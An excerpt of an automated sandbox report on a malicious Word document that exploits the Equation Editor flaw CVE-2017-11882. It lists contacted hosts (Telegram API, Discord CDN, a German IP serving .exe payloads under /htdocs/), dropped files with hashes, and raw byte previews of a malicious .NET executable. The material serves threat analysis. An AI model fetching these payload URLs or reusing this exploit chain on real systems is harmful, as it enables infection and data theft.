                                              http://109.206.241.81PClient.exe, 00000009.00000002.928434749.0000000002140000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984981021.0000000002680000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1002192486.0000000002680000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low
                                              https://api.ipify.org%RegSvcs.exe, 0000000A.00000002.986080759.0000000002309000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              low
                                              http://crl.entrust.net/2048ca.crl0Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                149.154.167.220
                                                api.telegram.orgUnited Kingdom
                                                62041TELEGRAMRUfalse
                                                109.206.241.81
                                                unknownGermany
                                                209929AWMLTNLfalse
                                                162.159.135.233
                                                unknownUnited States
                                                13335CLOUDFLARENETUSfalse
                                                162.159.133.233
                                                unknownUnited States
                                                13335CLOUDFLARENETUSfalse
                                                162.159.134.233
                                                cdn.discordapp.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                Joe Sandbox Version:35.0.0 Citrine
                                                Analysis ID:680478
                                                Start date and time: 08/08/202217:17:082022-08-08 17:17:08 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 10m 40s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:ICPO07082299976.doc
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                Number of analysed new started processes analysed:22
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.expl.evad.winDOC@21/15@9/5
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HDC Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 120
                                                • Number of non-executed functions: 1
                                                Cookbook Comments:
                                                • Found application associated with file extension: .doc
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Active ActiveX Object
                                                • Active ActiveX Object
                                                • Active ActiveX Object
                                                • Scroll down
                                                • Close Viewer
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                                • Execution Graph export aborted for target EQNEDT32.EXE, PID 2164 because there are no executed function
                                                • Execution Graph export aborted for target EQNEDT32.EXE, PID 2612 because there are no executed function
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtCreateFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                TimeTypeDescription
                                                17:18:14API Interceptor83x Sleep call for process: EQNEDT32.EXE modified
                                                17:18:22API Interceptor129x Sleep call for process: Client.exe modified
                                                17:18:30API Interceptor881x Sleep call for process: RegSvcs.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                149.154.167.220SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeGet hashmaliciousBrowse
                                                  request.exeGet hashmaliciousBrowse
                                                    ContractXXPI.xlsxGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Variant.Bulz.937784.5501.exeGet hashmaliciousBrowse
                                                        rust-stealer-xss.exeGet hashmaliciousBrowse
                                                          a0V4cfjFCK.vbsGet hashmaliciousBrowse
                                                            Required Purchase Order Ref 00172288.exeGet hashmaliciousBrowse
                                                              CoRZhrNXxb.xlsGet hashmaliciousBrowse
                                                                c6x4iN3EVE.xlsGet hashmaliciousBrowse
                                                                  VD3kw06iCC.xlsGet hashmaliciousBrowse
                                                                    zpfIAGKnk7.xlsGet hashmaliciousBrowse
                                                                      Facturas Pagadas al VencimientoPDF.exeGet hashmaliciousBrowse
                                                                        wKQpOZ58Gl.exeGet hashmaliciousBrowse
                                                                          RvYALbdIdN.exeGet hashmaliciousBrowse
                                                                            I3bn6YJwLc.exeGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.W32.AIDetectNet.01.19566.exeGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.W32.AIDetectNet.01.19595.exeGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.Trojan.MSIL.FormBook.IZFA.MTB.26806.exeGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousBrowse
                                                                                      ZYWXyzZQKo.exeGet hashmaliciousBrowse
                                                                                        109.206.241.81Contract - Wipak Oy.xlsxGet hashmaliciousBrowse
                                                                                        • 109.206.241.81/htdocs/zTALg.exe
                                                                                        t3uEMr422v.exeGet hashmaliciousBrowse
                                                                                        • 109.206.241.81/htdocs/RdSwQ.exe
                                                                                        cTdude9J3m.exeGet hashmaliciousBrowse
                                                                                        • 109.206.241.81:55527/
                                                                                        uED2AIUn6R.exeGet hashmaliciousBrowse
                                                                                        • 109.206.241.81/htdocs/AnWLP.exe
                                                                                        PO 7500093232.exeGet hashmaliciousBrowse
                                                                                        • 109.206.241.81/htdocs/GsLQA.exe
                                                                                        System.Activities.exeGet hashmaliciousBrowse
                                                                                        • 109.206.241.81/htdocs/yCBAj.exe
                                                                                        SOA for July.exeGet hashmaliciousBrowse
                                                                                        • 109.206.241.81/htdocs/ZsRSF.exe
                                                                                        SecuriteInfo.com.MSIL.Downloadergen2.14361.exeGet hashmaliciousBrowse
                                                                                        • 109.206.241.81/htdocs/RkPHN.exe
                                                                                        SecuriteInfo.com.Trojan.MSIL.BluStealer.NX.MTB.13214.exeGet hashmaliciousBrowse
                                                                                        • 109.206.241.81/htdocs/CnBAH.exe
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                        cdn.discordapp.com3F95733711B8F39FF7BC3458FF49EF57CD4411F3A813D.exeGet hashmaliciousBrowse
                                                                                        • 162.159.134.233
                                                                                        DECLARATIE EXPORT UK1RO-0108DSV_0381.exeGet hashmaliciousBrowse
                                                                                        • 162.159.130.233
                                                                                        FC45728DCDF75985369C218C0386D8B5E3E49FCBCE67B.exeGet hashmaliciousBrowse
                                                                                        • 162.159.133.233
                                                                                        Document.pdf.exeGet hashmaliciousBrowse
                                                                                        • 162.159.134.233
                                                                                        filedata.exeGet hashmaliciousBrowse
                                                                                        • 162.159.130.233
                                                                                        CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exeGet hashmaliciousBrowse
                                                                                        • 162.159.135.233
                                                                                        AB479D019576EFD4DD391E0BF3FC1BEDB10367E1ECE71.exeGet hashmaliciousBrowse
                                                                                        • 162.159.130.233
                                                                                        W6EwiWgNYe.exeGet hashmaliciousBrowse
                                                                                        • 162.159.129.233
                                                                                        F0Zluo0VUe.exeGet hashmaliciousBrowse
                                                                                        • 162.159.134.233
                                                                                        tmpuB1xoC.vbsGet hashmaliciousBrowse
                                                                                        • 162.159.133.233
                                                                                        7287980C1AFB840A7438471126C0C95C36FEFA79A013F.exeGet hashmaliciousBrowse
                                                                                        • 162.159.130.233
                                                                                        Contract - Wipak Oy.xlsxGet hashmaliciousBrowse
                                                                                        • 162.159.129.233
                                                                                        3CzQDO1WLI.exeGet hashmaliciousBrowse
                                                                                        • 162.159.133.233
                                                                                        57lsAxwpQZ.exeGet hashmaliciousBrowse
                                                                                        • 162.159.130.233
                                                                                        DOCUMENTO DE IMPUESTO PREDIAL.exeGet hashmaliciousBrowse
                                                                                        • 162.159.130.233
                                                                                        SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousBrowse
                                                                                        • 162.159.129.233
                                                                                        Plasma.exeGet hashmaliciousBrowse
                                                                                        • 162.159.135.233
                                                                                        e4.exeGet hashmaliciousBrowse
                                                                                        • 162.159.129.233
                                                                                        GnyGIMOLwK.exeGet hashmaliciousBrowse
                                                                                        • 162.159.133.233
                                                                                        AxseMjBluY.exeGet hashmaliciousBrowse
                                                                                        • 162.159.130.233
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                        TELEGRAMRUXEwRq24Jzi.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.99
                                                                                        7xDc75eWj9.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.99
                                                                                        JE9fxKRKJj.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.99
                                                                                        SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        request.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        ContractXXPI.xlsxGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        9wjhz2j3et.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.99
                                                                                        SecuriteInfo.com.Variant.Bulz.937784.5501.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        Nx6jI5VUNl.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.99
                                                                                        rKEgLUOUBV.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.99
                                                                                        2q26XBTFHo.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.99
                                                                                        OYAoPWfEl4.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.99
                                                                                        8Lx0Glwj6L.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.99
                                                                                        rust-stealer-xss.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        akJQGjPZB5.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.99
                                                                                        CmK5qu31GG.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.99
                                                                                        X4WDufM5Nt.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.99
                                                                                        da5dINQkNa.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.99
                                                                                        p3pPK1Vc6A.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.99
                                                                                        AGYBQdiv78.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.99
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                        36f7277af969a6947a61ae0b815907a1ContractXXPI.xlsxGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        Contract - Wipak Oy.xlsxGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        yHYWC.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        Payment_Advice.docxGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        NEWXORDERX16778612022.xlsxGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        PI 120003638 - CFR R#U00c9VIS#U00c9.xlsxGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        RFQ_07202022.docGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        #U041f#U0440#U043e#U0435#U043a#U0442.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        Purchase Order 1.docGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        BL Original Shipping Doc.xlsxGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        BL-220712-001 & PACKING LIST.xlsxGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        TITOL EURO 7280 PAYMENT RECIPE.docGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        Att_file.xlsxGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        Purchase order 2.xlsxGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        Dhlinvoice.xlsxGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        Electronic Funds TT.xlsxGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        PO.xlsxGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        #30062022 PAYMENT FM.xlsxGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        Nordre Follo_MomSmartClient_x64.msiGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        T3yEmiknvv.exeGet hashmaliciousBrowse
                                                                                        • 149.154.167.220
                                                                                        • 162.159.135.233
                                                                                        • 162.159.133.233
                                                                                        • 162.159.134.233
                                                                                        No context
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
                                                                                        Category:dropped
                                                                                        Size (bytes):3702
                                                                                        Entropy (8bit):5.028597528779477
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:Jk7Hgwj+mbYf3LSrhlOs0f5aSdHn63DfW:Jk7Awam8fI4s0f5aG
                                                                                        MD5:F3126E994D3AA1C22F44D22054B5DD3B
                                                                                        SHA1:BAE4EB99B4C4596B2A11C8384FF412CC187A3D4C
                                                                                        SHA-256:35C12280A850D4A15DC10F9FB18B2720CBA655212DE843699E883C14BDA6B655
                                                                                        SHA-512:B0379D6991B4C24E9C0436D9A6CF976714ECEA83269545006B0E0807D8024BBF215E8D1E8DF554738604CD5C5E6C3432DEADFE99E7C823680AA4FEFD4C2348C6
                                                                                        Malicious:false
                                                                                        Preview:......;.....!.....................5.@.........................Segoe UI....C.......@.......B.......-...........................A..... . ..... . .....(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . .....(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:Targa image data - Map - RLE 28 x 65536 x 0 +2 "\005"
                                                                                        Category:dropped
                                                                                        Size (bytes):316
                                                                                        Entropy (8bit):3.6967553326639724
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Mgt2oto90ogtQFP4ozgwc/GbVJGp+PmgEhSAl9us3qUUu4XC1ynuKb6wdxklct:M+eghObDGUOBwAl9NgXCYnhb6cs0
                                                                                        MD5:95BB648D6EB9265EEAF0F889731B1E23
                                                                                        SHA1:631D60A024835F4E53CEB9D0A987CE52FE517DF4
                                                                                        SHA-256:9639441A9D36E7E4FDA980961B75EEB334540B8CFBCEE71EB3CD857E0A838E0C
                                                                                        SHA-512:184414EA68092124290049282147070A86172833359404EE26199A36083D720E291D55BB85E4AE1D02504CE841EFBC646760E7CC5AF4088A253AED7B2665C420
                                                                                        Malicious:false
                                                                                        Preview:............................................................................`.....&....................... ...f.......&.....MathType.. .........................Times New Roman....._-.e............-.......2.`.......111.....&......................................"System..H...........H.......l.......-.................
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                        Category:dropped
                                                                                        Size (bytes):29184
                                                                                        Entropy (8bit):4.117039762726296
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:guc+esp7KCwXIi0bNYvjiq2dDesp7KCwXIi0bw8:gu6W78L0bNYuZdKW78L0bj
                                                                                        MD5:973FC02BC9B9F4803AA20DB1103B37DD
                                                                                        SHA1:A8CCDB739569095E773D85F097DA299D32E8DD0D
                                                                                        SHA-256:CFA62BD8A42B72C6F6E2D65DB2BF56284F0D40A84FEFD56D66E330010E47D8C1
                                                                                        SHA-512:896F286719C15B96D3ABCC8722F838D320AB2CC39D981D10B1B72C5AF9D0FDFA5C15104B2FA64CF208E60A8D78D7EB7E55E7C1AE582F7BDA3A503F74E52F3C0A
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp, Author: ReversingLabs
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................3...........1...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0.......2...4...5...7...6...................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1024
                                                                                        Entropy (8bit):0.05390218305374581
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ol3lYdn:4Wn
                                                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                        Malicious:false
                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):2048
                                                                                        Entropy (8bit):1.2588286511700073
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:UnMClMu1MClXu5CQJ/6HuJHujJHuguGI150u5p1506MV:UJ1CiHwHUHvp
                                                                                        MD5:C1EC4C65DBA5BCBB60A05E5A8A8BB166
                                                                                        SHA1:BDE091AF965162FE367B6532B33177C8297BD90D
                                                                                        SHA-256:1C7A0AB855519071EB6CF11D3DA398B0F165F18E0BEE6AFD57B62722650AF3C7
                                                                                        SHA-512:C92F785AC356A2D023F47DF7F648593DCA84433490A1AED36454B8F93F829CE7557A6FD26E5BDFAE32C9D9DAD87E3B5A7D10FE3D1C9049DC5962740564E44839
                                                                                        Malicious:false
                                                                                        Preview:P.a.c.k.a.g.e.=......... .P.a.c.k.a.g.e.E.M.B.E.D.E.q.u.a.t.i.o.n...3.=.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................D...F...L.......................................................................................................................................................................................................................................................................................................................................................j....OJ%.QJ%.U..^J%.mH..sH....j....OJ%.QJ%.U..^J%.mH..sH....j....OJ%.QJ%.U..^J%.mH..sH.. .j..f...OJ%.QJ%.U..^J%.mH..sH.
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):8192
                                                                                        Entropy (8bit):5.009053920991871
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:mtxVe3Lmux4xj4g4d4lI7P6GH0bjiCeQwDb1X1bH1krb49J1MvJ1tzNtK:Ie3yuexs3ClIT67KCeV1X1qAr10J1H
                                                                                        MD5:7E2FF60FD955B39768565DFE645E49C0
                                                                                        SHA1:7B1E009A4D140A42F1E7B67BD8646A4704782A59
                                                                                        SHA-256:07A45AA5F41DBEFD3E58E2AD335EEDAFD17317B0026AFC1F907640A119E4F309
                                                                                        SHA-512:AFA8D0255006324F4B933DC294B9CD630987FC0A9F0B6AC45018A1D6D406A9DF35C43251E1A0796DE84A63026AD3217F97FF22717A87ABD060D93A1FC4CFED40
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 20%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!..b.............................5... ...@....@.. ....................................@..................................4..W....@.......................`.......3............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................5......H.......$"..h............................................................0..........s......(.... ....(....r...pr...p(....(.....r...pr...p(....(.......o....(................rL..p....~..........o..........r...p...........r...p...(....o....r...p...........r"..p...(.... ........t....o....&...,..o.....*..................0..T.......r...p..o.........+;..(....(.......o....].X(....(....Y.....(....(....(.......X...1..*.0..5.......~.....(......, rT..p.....(....o....s...........~....*.~.
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:gAWY3n:qY3n
                                                                                        MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                        SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                        SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                        SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]..ZoneId=3..
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:53 2022, mtime=Tue Mar 8 15:45:53 2022, atime=Mon Aug 8 23:18:10 2022, length=33775, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):1039
                                                                                        Entropy (8bit):4.523180105729946
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:8PPWxpRgXg/XAlCPCHaXRBktB/eLX+WE0df/xgigXHCicvbNwVJ8dX5DtZ3YilM9:8PeDn/XThOMa0df/xfgJepwcDv3qYu7D
                                                                                        MD5:04DCD0B1A7C60F59B36577DA8AF24E27
                                                                                        SHA1:32B983ED71A1068D2287B94C98EED5FF594AF165
                                                                                        SHA-256:1589299BDC81D6A1A4759EC986C53615913B50C7D0BBCD8D9B069674629E48F4
                                                                                        SHA-512:F6FD83C798172B030035E2A37C725AB359CAE23F7B9D90AA83D62237F4F3EB6900ED2CAE788082A256A025A9F030AC956853C16D9D1B072E0DF3B74F7DDEF474
                                                                                        Malicious:false
                                                                                        Preview:L..................F.... ...$x...3..$x...3..d)..................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.....UF. .ICPO07~1.DOC..T......hT..hT..*...r.....'...............I.C.P.O.0.7.0.8.2.2.9.9.9.7.6...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\472847\Users.user\Desktop\ICPO07082299976.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.C.P.O.0.7.0.8.2.2.9.9.9.7.6...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......472847..........D_....3N...W...9G..N..... ...
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):81
                                                                                        Entropy (8bit):4.7730615409020976
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:bDuMJl07sXcgDomX1H1qVsXcgDov:bCIDYmDy
                                                                                        MD5:4F96DD0C46EE4AE90EB200870FC79FC8
                                                                                        SHA1:14E9CF8B0261A46E6A0097306734781ABA3D17D4
                                                                                        SHA-256:FFA3709A7DD55B27453F9BAFA44D91E9DD2D3BA04B164B8E3F672D7421492BA4
                                                                                        SHA-512:EA991D7ECECA8727F65462B8C18BA8CBD25B3417AD3D163075B43EF5D08C42459A8608F389823EB26712D0D35C2406960CAAFD2D610403B665682A49298D9081
                                                                                        Malicious:false
                                                                                        Preview:[folders]..Templates.LNK=0..ICPO07082299976.LNK=0..[doc]..ICPO07082299976.LNK=0..
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):162
                                                                                        Entropy (8bit):2.503835550707525
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                                                                        MD5:7CFA404FD881AF8DF49EA584FE153C61
                                                                                        SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                                                                        SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                                                                        SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                                                                        Malicious:false
                                                                                        Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):0.9650411582864293
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
                                                                                        MD5:903C35B27A5774A639A90D5332EEF8E0
                                                                                        SHA1:5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
                                                                                        SHA-256:1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
                                                                                        SHA-512:076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
                                                                                        Malicious:false
